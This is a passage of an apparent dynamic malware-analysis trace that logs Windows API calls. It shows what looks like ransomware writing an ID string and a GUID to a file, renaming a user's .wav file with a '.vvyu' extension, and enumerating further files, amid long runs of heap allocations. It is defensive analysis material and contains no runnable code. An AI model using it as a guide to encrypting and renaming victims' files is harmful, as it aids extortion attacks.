lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.274] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.274] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.274] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.274] CloseHandle (hObject=0x510) returned 1 [0201.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0201.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0201.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0201.276] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\T lAIuy5VUmxfxAcJn.wav" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\t laiuy5vumxfxacjn.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\T lAIuy5VUmxfxAcJn.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\t laiuy5vumxfxacjn.wav.vvyu")) returned 1 [0201.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.287] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0201.290] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a78aee0, ftCreationTime.dwHighDateTime=0x1d8a0ae, ftLastAccessTime.dwLowDateTime=0xa4e20820, ftLastAccessTime.dwHighDateTime=0x1d8a14d, ftLastWriteTime.dwLowDateTime=0xa4e20820, ftLastWriteTime.dwHighDateTime=0x1d8a14d, nFileSizeHigh=0x0, nFileSizeLow=0x29d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T lAIuy5VUmxfxAcJn.wav", cAlternateFileName="TLAIUY~1.WAV")) returned 0 [0201.291] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0201.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0201.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0201.292] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0201.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.292] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0201.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0201.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0201.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 